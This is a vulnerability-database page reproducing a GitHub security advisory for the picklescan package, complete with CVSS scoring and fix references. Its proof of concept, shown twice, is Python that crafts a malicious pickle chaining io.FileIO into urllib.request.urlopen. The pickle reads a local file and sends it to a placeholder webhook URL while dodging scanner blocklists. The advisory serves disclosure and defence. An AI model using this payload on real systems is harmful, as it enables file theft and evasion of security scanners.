GHSA-9726-W42J-3QJR

Vulnerability from github – Published: 2026-01-08 17:25 – Updated: 2026-01-08 17:25
VLAI?
Summary
picklescan has Arbitrary file read using `io.FileIO`
Details

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.

  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.

  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)

Screenshot 2025-12-30 at 10 13 14 PM

Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.

Severity ?
8.8 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-08T17:25:35Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nUnsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.\n\n### Details\nThe application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:\n\n1. io.FileIO: Opens local files without using builtins.open.\n\n2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.\n\n3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.\n\n### PoC\n\n```python\nimport pickle, io, urllib.request\n\nclass GetFile:\n    def __reduce__(self):\n        return (io.FileIO, (\u0027/etc/hosts\u0027, \u0027r\u0027))\n\nclass Exfiltrate:\n    def __reduce__(self):\n        return (urllib.request.urlopen, (\u0027https://webhook.site/YOUR_UUID_HERE\u0027, GetFile()))\n\nwith open(\"bypass_http.pkl\", \"wb\") as f:\n    pickle.dump(Exfiltrate(), f)\n```\n\n\u003cimg width=\"650\" height=\"114\" alt=\"Screenshot 2025-12-30 at 10 13 14\u202fPM\" src=\"https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994\" /\u003e\n\n\n### Impact\n\n- Arbitrary file read\n\nThanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.",
  "id": "GHSA-9726-w42j-3qjr",
  "modified": "2026-01-08T17:25:35Z",
  "published": "2026-01-08T17:25:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/55"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "picklescan has Arbitrary file read using `io.FileIO` "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.